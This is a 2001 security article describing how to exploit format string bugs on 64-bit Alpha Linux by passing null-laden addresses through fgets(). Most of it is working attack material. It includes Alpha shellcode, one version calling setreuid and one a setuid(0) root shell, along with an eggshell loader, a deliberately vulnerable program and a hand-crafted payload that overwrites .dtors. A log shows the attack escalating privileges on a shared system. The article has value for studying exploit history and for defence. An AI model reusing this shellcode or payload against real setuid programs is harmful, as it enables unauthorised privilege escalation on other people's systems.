"Format String Attack on alpha system"
Seunghyun Seo (truefinder), 2001/09/24
seo@igrus.inha.ac.kr
http://igrus.inha.ac.kr/~seo
- Instruction ]
This article describes format string attack in the limited situation on alpha system
- i will call the operating systems which are based on alpha cpu as alpha systems .
i'm sorry that this is not a really cool something. coz we know well how to exploit format
string bugs on x86 systems and the others too. you would notice that the process of our
work mihgt be similar to exploit on x86, but there are exactly difference between them.
someone didn't think it really work on alpha systems and beleive that it's impossible to
exploit, since it use 64bits address which have so many 0x00 so that we couldn't control
it as sequential characters. now i will discuss about it whether it's possible to exploit
or not.
It seems that it's impossible to exploit format string bugs on alpha systems.
i remmember i had discussed it with so many ppls on internet for 2 monthes ago and we
concluded it is not a exploitable problem, but just a program bug. after a one month past,
i'd got some idea about that and i got tested several works on public alpha linux. (RH 7.1)
at last, i supprised that it worked, though there were some limitation in the situation.
briefly, the limitated situation is like below
1. vulnerable application should get user input string from the file descriptor like
function 'fgets()'
2. address align and format string should be set by one's hand in detail
( it means it's different from attack with 'brute forcing method' )
3. program should have read permission for reading static address of .dtors
( it's for your convenience, if not, it could be very difficult to exploit. )
anyway, i think that format string bugs are not safe any more on alpha systems.
- Content ]
Alpha is the CPU using 64 bits registers and addresses. Alpha *NIX has each file format.
digital unix uses coff (Common object file format), netbsd uses elf 64 ( excutable and
linkable file format) , linux uses also elf 64. whatever in general, stack base address is
allocated to 0x000000011fffffff ~ 0x0000000000000 and .text section is allocted to
0x0000000120000000 ~ ???????????????? on the alpha systems.
what a unhappy ! there are so many null(0x00) bytes in their address.
in the past time, ohhara ( ohhara@postech.edu ) described how to exploit buffer overflow
bug on alpha linux. he announced that our arbitrary return addresses couldn't be inserted
into our environmental variables or arguments all, but only one does. coz there are so many
null code in the address and it blocks our work.
<case of buffer overflow exploit>
"/* align */"
"/* nops */"
"/* shellcode */"
"\xc0\xfe\xff\x1f\x01\x00\x00\x00"
"\xc0\xfe\xff\x1f\x01\x00\x00\x00"
"\xc0\xfe\xff\x1f\x01\x00\x00\x00"
"/* ; return addresses */
if above string is our arbirary string, then it is reconized as below stuff
"/* align */"
"/* nops */"
"/* shellcode */"
"\xc0\xfe\xff\x1f\x01"
^
|
\x00 : this would be reconized end of string.
this feature is showing why the exploit of alpha linux buffer overflow should get only
one return address. and that is a fatal problem against the format string bug exploit.
as a matter of fact , arbitrary format string is constructed with 2 or more addresses
like this
<case of format string exploit>
"\xc0\xfe\xff\x1f\x01\x00\x00\x00"
"\xc2\xfe\xff\x1f\x01\x00\x00\x00"
"\xc3\xfe\xff\x1f\x01\x00\x00\x00"
"\xc4\xfe\xff\x1f\x01\x00\x00\x00"
"blah%blah .u%hn"
"blah%blah .u%hn"
"blah%blah .u%hn"
"blah%blah .u%hn"
It seems to be impossible to set that strings into our program environmental values or
arguments properly. i explained the reason 'why' already. environmental variables are read
as a string before program started and it's also read as a common string (string is a
sequential bytes that is ended by null 0x00). arguments are also read as a string. it works
like case of environmental variables too. so we couldn't construct our arbirary format string
stuff in the environmental variables or arguments with expected branch address and control
directives.
now we know that it's very difficult to set arbitrary format strings into user environmental
variables or application arguments. it seems to be impposible even, so the program that has
bugs in his option like "-x [string]" is not to be vulnerable. i have no idea about that yet,
since we couldn't use our arbitrary format string that include 64bits addresses to fit
properly. if someone have idea about that, then plz send mail to me seo@igrus.inha.ac.kr.
we need more discussion about it.
But how about application that using 'fgets()' or 'read()' for getting user input string ?
How about application that using functions which get user input strings through
file descriptor ?
* this is the point of this document.
for instance, fgets() reads string from file descriptor still EOF(-1) encounted. it means
null(0x00) is not a problem to us more over, so we could put something into it's stack like
64bits addresses and arbitrary format control directives. exactly, 0x00 could be passed to
that application. we might use it as a 'our arbirary format string'.
as a result, it gives us more chances.
"aaaaaaa\x00\x00\x00\x01\x1f\xff\xff\xff%p"
if application use fgets() for user input string, something binary character stuffs could
be passed and set in his stack. so our hell string would be stored in application stack.
you can confirm what it features from snip1
-- snip1 --
0x11ffff7b0 1a 00 00 00 00 00 00 00 61 61 61 61 61 61 61 00 ........aaaaaaa.
0x11ffff7c0 00 00 01 1f ff ff ff 25 70 00 df 03 00 00 00 00 .......%p.......
-- snip2 --
But there are another problem, a kind of printf() functions reconize it also as a string
,which should be cutted off in front of "null", it would parse only above string as "aaaaaaa"
character set. so speak to say, it prints only "aaaaaaa" and do nothing after. parsing is over.
however, we need not be worried about that, it could be solved simply. we know that we could
use %digit$ directives to pull something out from stack. and if we get command string to
locate in the forth of string, then we could keep our work on successfully.
"%<digit>$p%<digit+1>$p\x00\x00\x00\x01\xff\xff\xff\xff\x00\x00\x00\x01\xfc\xff\xff\xff"
ok. it seems to work well.
the remant of our work is doing exploit.
In the eve of exploit, i have to describe some of my work to readers.
since i'd used public system and i think it is not general exploit,
you should know what i had to do. if you got it all, then you could also test it on your
system.
*might you need some attention to apply my sources to your system.
i'd got two accounts seo( uid 27817 ), true( uid 28930 ). vulnerable program has set-user-bit
and it named vul, it's owned by user seo. The attacker was true(28930). he coded exploit
sources to try to exploit it. it was a eggshell 'egg.c' and arbitrary format string attack
script 'vulex.sh'.
you can notice something different shellcode against common one in my egg.c.
i want to explain it now. i had to add proper setreuid() into shellcode and replace
"/bin/sh" to "/bin/vi", since my freeshell admin changed original "sh" to his abnormal one.
his "sh" didn't seem to work properly, so i decided to excute anything else.
he also changed "/usr/bin/vi" to "/bin/vi" , thus after all, "vi" was selected to excute.
exploit vulex.sh would attack to change .dtors's destructor routine address to our abitrary
eggshell address, so that program would jump to there after end of all program routines.
shellcode would call setreuid() to change his uid and call exec "/bin/vi". we could
confirm our resutl whether it was exploited or not by typing ":!id". more detail description
followes.
- Description ]
There are 3 sources egg.c, vulex.sh, vul.c
+ egg.c is the eggshell on alpha system, he include nops and exec "/bin/vi" shellcode
it would also set align before exploit, it could be used directly after your compilation.
+ vul.c is format string vulnerable proggie which use "fgets()" for user input
+ vulex.sh is a script for attack, it's not brute force but hand made
"hand made" means you have to set your own arbitrary format string with addresses and
offset by yourself on your system. it couldn't be used directly, you have to modify this
to fit it on your system i guess. defualt .dtors's destruct address is 0x120010be0 and
we change that to 0x11ffffcb0
if you want to try it on your system
first, you should compile egg.c, vul.c and change our victim 'vul' owner blah,
mode to 4755
second, you should find .dtors's address of vul, use gnu binary utility 'objdump'
'objdump -s -j .dtors ./vul' will help you.
you might see similar features like the snip2.
-- snip2 --
public.alpha.system> objdump -s -j .dtors vul
vul: file format elf64-alpha
Contents of section .dtors:
120010bd8 ffffffff ffffffff 00000000 00000000 ................
public.alpha.system>
-- snip2 --
check .dtors's destructor address of vul is 120010be0
third, we should make some arbirary string. you can see example in the next
it could be bored since it should be set by your hand in detail, never brute force script
example) "%18\$176p%19\$ln %18\$74p %20\$n %23\$1d %21\$n %18\$30p %22\$n AAAAAAAA\xe0\x0b\x01\x20\x01\x00\x00\x00\xe1\x0b\x01\x20\x01\x00\x00\x00\xe2\x0b\x01\x20\x01\x00\x00\x00\xe3\x0b\x01\x20\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n"
* this arbirary string constructed with four addresses and it would overwrite four bytes
0x120010be0 ~ 0x120010be3 with our expected parted address. if it works correctly, then
program would jump to 0x11ffffcb0 which is address of our eggshell hole (nops+shellcode)
region. if not, program killed by signal SIGILL or SIGSEGV.
in detail, %19$ln will overwrite address 0x120010be0~8 with value 0x00000000 0x000000b0,
%20$n will overwrite address 0x12001be1 with value 0xfc and so blah blah...
it's similar on x86 exploit.
finally, we could try it
./egg 1
$./vulex.sh
and next try would be
./egg 2
$./vulex.sh
Actual demonstration were attached. confer it.
- Demonstaration ]
public.alpha.system> ls
egg egg.c vul vul.c vulex.sh
public.alpha.system> objdump -s -j .dtors vul
vul: file format elf64-alpha
Contents of section .dtors:
120010bd8 ffffffff ffffffff 00000000 00000000 ................
public.alpha.system> id
uid=28930(true) gid=501(nis) groups=501(nis)
public.alpha.system> whereis vi
vi: /bin/vi /usr/share/man/man1/vi.1.gz
public.alpha.system> ./egg 1
sh-2.04$ ./vulex.sh
Vim: Warning: Input is not from a terminal
:!id
~
~
~
~
~
~
~
~
~
~
~
~
~ VIM - Vi IMproved
~
~ version 6.0z ALPHA
~ by Bram Moolenaar et al.
~ Vim is open source and freely distributable
~
~ Help poor children in Uganda!
~ type :help iccf<Enter> for information
~
~ type :q<Enter> to exit
~ type :help<Enter> or <F1> for on-line help
~ type :help version6<Enter> for version info
~
~
~
~
~
~
~
~
~
~
~
~
~
:!id
uid=27817(seo) gid=501(nis) groups=501(nis)
Hit ENTER or type command to continue
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
sh-2.04$ uid=28930(true) gid=501(nis) groups=501(nis)
sh-2.04$
- Sources ]
++ vul.c
/*
* this simple proggie has format string bug
* it's the source especially coded for vulnerable situation
*/
#include<stdio.h>
#include<stdlib.h>
int
main(void)
{
char *ch = "mailto:seo@igrus.inha.ac.kr";
char buf[512];
fgets( buf, sizeof(buf), stdin );
printf (buf);
}
++ egg.c
/*
* this shall set egg shell in our environment
* ./egg <size> <align>
* truefinder, seo@igrus.inha.ac.kr
*
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define DEF_EGGSIZE 4096
#define DEF_ALIGN 5
char nop[] = { 0x1f, 0x04, 0xff, 0x47, 0x00 };
#ifndef GENERAL_ROOT
static char shellcode[] =
"\x58\xfe\xde\x23\x0f\x04\xde\x47\x04\x74\xf0\x43\xa4\x01\x8f\xb0"
"\xa4\x01\x4f\x21\xfb\x6b\x3f\x24\x01\x80\x21\x20\xa8\x01\x2f\xb4"
"\xa9\x6c\x1f\x22\x02\x71\x3f\x22" /* a0 <- 27817 , a1 <- 28930 */
"\x80\xd4\xef\x47" /* call setreuid() */
"\xff\x7f\x4a\x6b\x69\x6e\x3f\x24"
"\x2f\x62\x21\x20\x76\x69\x5f\x24\xff\x2f\x42\x20\x82\x16\x41\x48"
"\x90\x01\x2f\xb0\x94\x01\x4f\xb0\x98\x01\xef\xb5\xa0\x01\xef\xb7"
"\x90\x01\x0f\x22\x98\x01\x2f\x22\x12\x04\xff\x47\x80\x74\xe7\x47"
"\xff\x7f\xea\x6b" ;
/* setuid(27817, 28930 ), exec "/bin/vi" shellcode by truefinder */
#endif
#ifdef GENERAL_ROOT
static char shellcode[] =
"\x58\xfe\xde\x23\x0f\x04\xde\x47\x04\x74\xf0\x43\xa4\x01\x8f\xb0"
"\xa4\x01\x4f\x21\xfb\x6b\x3f\x24\x01\x80\x21\x20\xa8\x01\x2f\xb4"
"\x10\x04\xff\x47\x80\xf4\xe2\x47\xff\x7f\x4a\x6b\x69\x6e\x3f\x24"
"\x2f\x62\x21\x20\x73\x68\x5f\x24\xff\x2f\x42\x20\x82\x16\x41\x48"
"\x90\x01\x2f\xb0\x94\x01\x4f\xb0\x98\x01\xef\xb5\xa0\x01\xef\xb7"
"\x90\x01\x0f\x22\x98\x01\x2f\x22\x12\x04\xff\x47\x80\x74\xe7\x47"
"\xff\x7f\xea\x6b" ;
/* setuid(0) , exec "/bin/sh" shellcode by truefinder */
#endif
int
main( int argc, char *argv[] )
{
char *eggbuf, *buf_ptr;
int align, i, eggsize ;
align = DEF_ALIGN;
eggsize = DEF_EGGSIZE ;
if ( argc < 2 ) {
printf ("%s <align> <size>\n", argv[0] );
exit(0);
}
if ( argc > 1 )
align = DEF_ALIGN + atoi(argv[1]);
if ( argc > 2 )
eggsize = atoi(argv[2]) + DEF_ALIGN ;
if ( (eggbuf = malloc( eggsize )) == NULL ) {
printf ("error : malloc \n");
exit (-1);
}
/* set egg buf */
memset( eggbuf, (int)NULL , eggsize );
for ( i = 0; i < 250 ; i++ )
strcat ( eggbuf, nop );
strcat ( eggbuf, shellcode );
for ( i =0 ; i < align ; i++ )
strcat ( eggbuf, "A");
memcpy ( eggbuf, "S=", 2 );
putenv ( eggbuf );
system("/bin/sh");
}
++ vulex.sh
#!/bin/sh
perl -e 'system , print "%18\$176p%19\$ln %18\$74p %20\$n %23\$1d %21\$n %18\$30p %22\$n AAAAAAAA\xe0\x0b\x01\x20\x01\x00\x00\x00\xe1\x0b\x01\x20\x01\x00\x00\x00\xe2\x0b\x01\x20\x01\x00\x00\x00\xe3\x0b\x01\x20\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n"' | ./vul
- Reference ]
[1] "Buffer overflow exploit in the alpha linux"
ohhara, ohhara@postech.edu
http://ohhara.sarang.net/security/alpha-bof.txt
[2] "Format string attack and General exploit"
truefinder , seo@igrus.inha.ac.kr
http://165.246.33.21/~seo/exposed/fmtstr-tech.txt
[3] "Overwriting the .dtors section"
Juan M. Bello Rivas , rwxrwxrwx@synnergy.net
http://www.synnergy.net/downloads/papers/dtors.txt
[4] "Assembly Language Programmer's Guide"
ⓒ Compaq Computer Corporation 1996
http://www.tru64unix.compaq.com/docs/base_doc/DOCUMENTATION/V40E_HTML/APS31DTE/TITLE.HTM
[5] "Smashing The Stack For Fun And Profit"
Aleph One, aleph1@underground.org
http://www.phrack.org/show.php?p=49&a=14
- EOF ]